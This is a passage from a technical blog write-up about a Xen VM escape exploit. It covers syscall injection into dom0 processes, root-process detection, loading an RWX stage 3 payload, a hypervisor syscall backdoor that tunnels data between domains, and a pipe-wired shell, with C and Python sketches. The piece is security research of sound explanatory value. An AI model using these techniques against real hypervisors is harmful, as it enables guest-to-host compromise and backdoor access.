On Linux there aren’t nearly so many syscalls, and 391 isn’t even valid. From /arch/x86/syscalls/syscall_64.tbl we see that syscalls end at value 322, and resume at 512.

319    common memfd_create         sys_memfd_create
320    common kexec_file_load      sys_kexec_file_load
321    common bpf                  sys_bpf
322    64     execveat             stub_execveat
# x32-specific system call numbers start at 512 to avoid cache impact
# for native 64-bit operation.
512    x32    rt_sigaction         compat_sys_rt_sigaction
513    x32    rt_sigreturn         stub_x32_rt_sigreturn
514    x32    ioctl                compat_sys_ioctl

And from /arch/x86/syscalls/syscall_32.tbl we see the maximum syscall value is 358. Unused system calls on Linux return -ENOSYS, via the sys_ni_syscall() function.

354  i386 seccomp         sys_seccomp
355  i386 getrandom       sys_getrandom
356  i386 memfd_create    sys_memfd_create
357  i386 bpf             sys_bpf
358  i386 execveat        sys_execveat               stub32_execveat

To reiterate, this means that if we inject syscall 391 into the dom0 process and intercept the result, a return of 0 means it’s NetBSD and a return of -ENOSYS means it’s Linux.
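The classification of the intercepted return value is small enough to sketch directly. The names are hypothetical; the value 38 is Linux’s ENOSYS, hard-coded because the payload compares against what a Linux dom0 kernel would return, not against the errno values of the machine the payload was built on.

```c
#define OS_PROBE_SYSCALL 391   /* IGNORED on NetBSD, unassigned on Linux */
#define LINUX_ENOSYS     38    /* ENOSYS as returned by a Linux kernel */

enum dom0_os { DOM0_LINUX, DOM0_NETBSD, DOM0_UNKNOWN };

/* ret is the value left in the return register after the injected
 * syscall 391 completes in the dom0 process. */
enum dom0_os classify_dom0_os(long ret)
{
    if (ret == 0)
        return DOM0_NETBSD;    /* IGNORED syscalls always succeed */
    if (ret == -LINUX_ENOSYS)
        return DOM0_LINUX;     /* sys_ni_syscall() result */
    return DOM0_UNKNOWN;       /* neither pattern: make no claim */
}
```

Keeping an explicit unknown result avoids migrating into an OS the payload was never written for.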

How do we inject syscalls? I won’t dive deeply into the details, but basically we have all of the information we need about the trapping process to save what it was trying to do, replace the values we want to control, and reset the return location so that it re-traps and we can resume the call it had wanted to make in the first place.

To provide a simple example, let’s examine the syscall instruction ABI. Syscall arguments are passed in %rdi, %rsi, %rdx, %r10, %r8, and %r9. The return address is stored in %rcx. The syscall number is stored in %rax. The userland stack is stored on our hypervisor stack, in order for us to later sysret or iretq back into userland. We simply store all of the argument registers and the original syscall number for restoration later. We then replace them with whatever we want.

In the case of OS detection, we simply change %rax to hold 391. We also decrement the return address by 2, so that when the syscall returns, it lands back onto the syscall instruction in userland and re-traps, allowing us to restore things.

Finally, we store the userland stack and the address of the syscall instruction itself. We do this last part so that we can accurately identify the exact same process and thread that we intercepted the call from, since the combination of the userland stack address and execution address should be a reliably unique pair.

That’s it. Now we just pass the syscall off as usual and wait for the next trap. For every dom0 trap we receive we test to see if there is a match against the code and stack pointers we saved. If so, we know that this is the dom0 process we injected into, and the return value from the previous syscall will be in %rax. As noted earlier, if it’s -ENOSYS we know it is Linux. If it’s 0, we know it is NetBSD.
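The bookkeeping for the syscall instruction case can be modelled in plain C. This is a simulation of the logic only, not payload code: the structures and function names are hypothetical, and the registers are represented as a struct rather than read from the real trap frame. The one hard fact it relies on is that the syscall instruction is two bytes long.

```c
#include <stdint.h>

/* Hypothetical view of the registers seen when userland executes syscall. */
struct trap_regs {
    uint64_t rax;   /* syscall number on entry, return value on re-trap */
    uint64_t rcx;   /* return address: the instruction after syscall */
    uint64_t rsp;   /* userland stack pointer */
    uint64_t rdi, rsi, rdx, r10, r8, r9;   /* syscall arguments */
};

struct inject_state {
    int              active;
    struct trap_regs saved;          /* original request, restored later */
    uint64_t         syscall_addr;   /* address of the syscall instruction */
};

#define SYSCALL_INSN_LEN 2           /* syscall encodes as 0f 05 */

/* Replace the pending syscall with `nr` and arrange for a re-trap. */
void inject_syscall(struct trap_regs *r, struct inject_state *st, uint64_t nr)
{
    st->saved = *r;
    st->syscall_addr = r->rcx - SYSCALL_INSN_LEN;
    st->active = 1;
    r->rax = nr;
    r->rcx = st->syscall_addr;       /* return onto the syscall instruction */
}

/* On a later trap: if it is the thread we injected into, store the injected
 * syscall's result in *result, restore the original request and return 1.
 * Otherwise return 0 and leave everything untouched. */
int handle_retrap(struct trap_regs *r, struct inject_state *st,
                  int64_t *result)
{
    if (!st->active ||
        r->rsp != st->saved.rsp ||
        r->rcx != st->syscall_addr + SYSCALL_INSN_LEN)
        return 0;
    *result = (int64_t)r->rax;
    *r = st->saved;
    st->active = 0;
    return 1;
}
```

After handle_retrap() returns 1 the registers describe the original syscall again, so the trap can be passed on to the guest kernel as if nothing had happened.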

I gave one example of injecting syscalls, but note that how this is done will depend on the actual trap type that was used to enter the payload. The syscall, int $0x80 and sysenter instructions all need to be handled in different ways in order to effectively inject and force re-traps.

There can also be shortcuts to the above. For instance, NetBSD still doesn’t support using sysenter for syscalls, so if the stage 2 payload is entered via sysenter, you can be reasonably sure it is Linux already and skip the injection.

Note that although I show how to differentiate between the dom0 OS, the rest of this article discusses things within the context of migrating into Linux, as it is highly unlikely that NetBSD would ever be encountered.

Finding a root process

The VUPEN article mentions identifying a root process to migrate into, but they don’t mention how they actually detect if a process is root. The first way I thought to do this was to mimic the way a kernel exploit or rootkit manipulates a process, which is just basically finding the associated kernel credential structure in memory and then testing it for root. There are a few problems with this approach.

First, you run into the same problem some kernel rootkits and exploits have: they can’t always be 100% certain what the credential offset is within the task structure, due to unknown configuration options and, in our case, an unknown kernel version in dom0 as well. This is typically solved by finding the task_struct base and searching for a known process name. The idle task on Linux is called swapper, so it can be reliably searched for in order to find the comm array within the task_struct. From there you can easily work backwards to find the credential structure. One example of this being done is an Android rootkit demonstrated in Phrack 68 [11].
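To make the name-search idea concrete, here is a minimal sketch in Python that scans a raw dump of a task structure for the idle task’s name. The function name and the synthetic input are hypothetical. The only layout facts assumed are that the comm array is 16 bytes and NUL-padded, and that the idle task may appear as either swapper or swapper/N depending on kernel version. The backwards walk to the credential pointer is left out because that part of the layout varies between kernels.

```python
TASK_COMM_LEN = 16  # size of the comm array in the Linux task_struct


def find_comm_offset(task_bytes, name=b"swapper"):
    """Return the offset of a NUL-padded comm field for `name`, or -1."""
    start = 0
    while True:
        off = task_bytes.find(name, start)
        if off < 0 or off + TASK_COMM_LEN > len(task_bytes):
            return -1
        field = task_bytes[off:off + TASK_COMM_LEN]
        text = field.split(b"\x00", 1)[0]
        padding = field[len(text):]
        # A real comm field is NUL-terminated and padded with NULs.
        looks_padded = len(padding) >= 1 and padding.strip(b"\x00") == b""
        # Accept "swapper" as well as per-CPU names such as "swapper/0".
        name_ok = text == name or text.startswith(name + b"/")
        if looks_padded and name_ok:
            return off
        start = off + 1  # false positive, keep scanning
```

Checking the padding as well as the name is a cheap way to reject stray occurrences of the string elsewhere in the scanned memory.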

In order to find the task_struct base in our case, we’d need to locate the kernel stack of the process that is trapping and access the thread_info structure on that stack, which will point us to the task_struct. In order to do this for the idle task, we’d have to test whether the trapping dom0 context is actually userland or kernel. Xen provides a flag to indicate this on PV guests, as noted. So far so good, but we run into a different problem.

When a userland process traps into the hypervisor via a syscall-related instruction, the page tables are set up to access userland’s memory only, not the kernel’s. So we can find the kernel stack address by parsing the vcpu structure, but we can’t actually access it. Transitioning to the guest’s kernel page tables is non-trivial to re-create and would otherwise require calling into a Xen function we don’t know the address of, so even if we knew the credential offset, we couldn’t easily get at it.

So I scrapped that idea and went back to the syscall injection route. We already inject syscalls to do OS detection, and if you’ve read the VUPEN paper, you know that’s how we’ll migrate into the dom0 process, so we may as well do it for root detection. We do exactly what was described for injecting the syscall for OS detection, but inject a getuid() syscall instead. If the return value is zero, we move on to the next phase of migration; otherwise we just restore the original syscall and leave the process alone.


Once we have a root process candidate, the process I follow is very similar to what VUPEN described: inject an mmap() call to allocate an RWX buffer, record the return address upon encountering the re-trap, copy a stage 3 userland payload into the new buffer, and redirect execution to the payload by changing the return address. I let this particular syscall fail, which just returns us to the buffer. As long as we have recorded the original values, we can have our stage 3 payload let us know when to restore them.

And of course depending on the underlying architecture of the dom0 process, I inject a different stage 3 payload.

One caveat to the payload I wrote is that the root process might actually be jailed in something like a namespace, and not have true root on the system. In order to break out of the namespace it would be ideal to simply patch the task_struct in the kernel, but we run into some of the problems mentioned above. One possibility is that once we have code running inside a process and know its process name, we could tell the stage 2 payload the name of our process and have it search through the task structure linked list at a time when the kernel page tables are set up correctly. If I recall correctly though, even if you know the comm array offset, finding the namespace pointer is not as straightforward as finding the credentials structure. I haven’t implemented this yet, so I won’t discuss it further.

Stage 2 summary

Obviously stage 2 has a lot to do, and it can be hard to keep track of it all, so I’ve provided a fairly simple flow diagram showing the points at which it comes into and out of play and how it works through everything that is needed.

Stage 3 payload

So now we’ve got our code running in a root process. The VUPEN article mentions using a bindshell or a connectback payload. I don’t like the idea of a bindshell because you don’t necessarily know the IP address of the dom0 system, so don’t easily know where to connect. Also both a bindshell and connectback payload suffer from failure in the event that the dom0 is restricted to an isolated network or has strict firewall controls.

I wanted to be able to access dom0 without any of these restrictions by using an inter-domain communication channel. Tunneling data between the guest and host in a VM escape exploit seems ideal. Kostya Kortchinsky used a framebuffer as a communication channel when exploiting VMware [12]. I’m pretty sure there are other examples, but I couldn’t dig any up, other than things like cache-based covert channels.

As with most things, there are a few ways to approach this. Originally I thought about using shared memory between domU and dom0 as a communication channel, much in the way the frontend and backend drivers communicate in paravirtualized guests. However, the issue with this is that dom0 must actively accept a grant offering from domU, which means doing so in the kernel. I didn’t want to have to compile an LKM once I was on dom0.

Another approach I thought about was using XenStore, which is an OpenFirmware-like text-based filesystem used to share information between guests and dom0. It is accessible from dom0 userland using the Xen API, and is accessible by default in PV guests. My issues with this approach were the reliance on certain libraries being available on dom0, the complexity of interacting with XenStore without those libraries, and the relatively low bandwidth that would be provided by something not meant for data transfers.

I decided that since I already have control of the hypervisor and it’s easy to trap into it in an identifiable way, I would just use the hypervisor itself as an intermediary for proxying data between domains. Although I didn’t mention it earlier, part of my stage 2 payload is basically a syscall backdoor. It can detect processes making certain backdoor requests and proxy data between memory locations. I use a simple polling mechanism on both the dom0 and domU sides.

As an example, let’s say dom0 makes a backdoor call to transfer up to 4 KB of memory. The stage 2 payload takes this and stores it in an intermediary buffer. Meanwhile domU is polling with a separate backdoor call to see if there is any data for it to receive from dom0. On its next iteration, the domU backdoor call will see that there is data pending and will copy it over. By using separate dom0 and domU data buffers, it’s easy to seamlessly transfer data between the two.
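The store-and-poll behaviour can be sketched as a pair of one-directional mailboxes. This is a simplified Python model with hypothetical class and method names. It assumes a queue of chunks per direction, whereas the real payload may well hold only a single buffer, and it caps each transfer at the 4 KB figure from the example above.

```python
from collections import deque

CHUNK = 4096  # each backdoor call moves at most 4 KB in this model


class Mailbox:
    """One-directional buffer held by the intermediary."""

    def __init__(self):
        self._pending = deque()

    def send(self, data):
        """Store up to CHUNK bytes; return how many bytes were accepted."""
        chunk = bytes(data[:CHUNK])
        if chunk:
            self._pending.append(chunk)
        return len(chunk)

    def poll(self):
        """Return the oldest pending chunk, or b"" if nothing is waiting."""
        return self._pending.popleft() if self._pending else b""


class Proxy:
    """Stands in for the hypervisor-side backdoor: one mailbox per direction."""

    def __init__(self):
        self._dom0_to_domu = Mailbox()
        self._domu_to_dom0 = Mailbox()

    def dom0_send(self, data):
        return self._dom0_to_domu.send(data)

    def domu_poll(self):
        return self._dom0_to_domu.poll()

    def domu_send(self, data):
        return self._domu_to_dom0.send(data)

    def dom0_poll(self):
        return self._domu_to_dom0.poll()
```

Keeping the two directions in separate buffers means neither side can overwrite data the other has not collected yet, which is why no locking between the senders is needed in this model.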

In order to make this work well for spawning a shell on dom0, I break my stage 3 payload into two parts. After forking into its own process, it sets up two pipes and then forks again. One copy of the process acts as a data proxy, copying data from the read pipe through the hypervisor backdoor, as well as reading data from the hypervisor backdoor and writing it to the write pipe. The other process uses dup2() to make the read and write pipes stdin and stdout/stderr respectively, and then spawns a shell as normal. This ends up looking like what is shown in the next illustration.
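The pipe plumbing is the standard Unix pattern, and a small Python sketch shows how the descriptors are wired. This is not the stage 3 payload: the function names are hypothetical, the parent process plays the role of the data proxy, and the hypervisor backdoor is replaced by simply returning the bytes read from the shell. It assumes a Unix-like system with /bin/sh present.

```python
import os


def spawn_shell_with_pipes():
    """Fork a shell whose stdin/stdout/stderr are pipes held by the parent."""
    to_shell_r, to_shell_w = os.pipe()      # proxy writes, shell reads
    from_shell_r, from_shell_w = os.pipe()  # shell writes, proxy reads

    pid = os.fork()
    if pid == 0:
        try:
            # Child: map the pipe ends onto the standard descriptors.
            os.dup2(to_shell_r, 0)
            os.dup2(from_shell_w, 1)
            os.dup2(from_shell_w, 2)
            for fd in (to_shell_r, to_shell_w, from_shell_r, from_shell_w):
                if fd > 2:
                    os.close(fd)
            os.execv("/bin/sh", ["sh"])
        finally:
            os._exit(127)  # only reached if exec failed

    # Parent (the proxy side): drop the ends that belong to the shell.
    os.close(to_shell_r)
    os.close(from_shell_w)
    return pid, to_shell_w, from_shell_r


def run_commands(script):
    """Feed `script` to the shell and collect everything it prints."""
    pid, shell_in, shell_out = spawn_shell_with_pipes()
    os.write(shell_in, script)
    os.close(shell_in)  # EOF on stdin lets the shell exit
    chunks = []
    while True:
        data = os.read(shell_out, 4096)
        if not data:
            break
        chunks.append(data)
    os.close(shell_out)
    os.waitpid(pid, 0)
    return b"".join(chunks)
```

For example, run_commands(b"uname -a\n") returns whatever the shell printed. In the real design, the read and write calls on the proxy side would be replaced by the backdoor transfers described earlier.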

To make this usable from the domU side, I use a userland frontend for the exploit that drives the LKM through exploitation and can then use the data tunneling backdoor, so that it is easy for the user to interact with it as if it were normal shellcode.

As a final note about this type of data tunneling: it works well for this exploit, but if you had only compromised dom0 directly, as demonstrated by @shiftreduce at 31C3 this year [13], you’d need to come up with another way, or you’d have to break into the hypervisor from dom0, which he suggested he could do anyway.


The following screenshots show exploitation on a 32-bit and 64-bit machine respectively. You can see that the shell shows a separate system, indicated by the uname output, and also you can see that domain-0 is running at the time xl list is run.




So that’s it. If you made it this far hopefully you have some ideas about how to write your own VM escape exploit.

Although this bug is a little old, I think it’s valuable to revisit interesting bugs and see what you can learn from them. Hopefully this shows that the considerations involved in blindly exploiting an OS can become quite complicated, but that it can be done in the right circumstances.

Thanks for reading.

If you have any comments or corrections please feel free to email me:

aaron <.>

adams <@>


  13. (Starts @ 1h50m): t=6609

Published date:  27 February 2015

Written by:  Aaron Adams
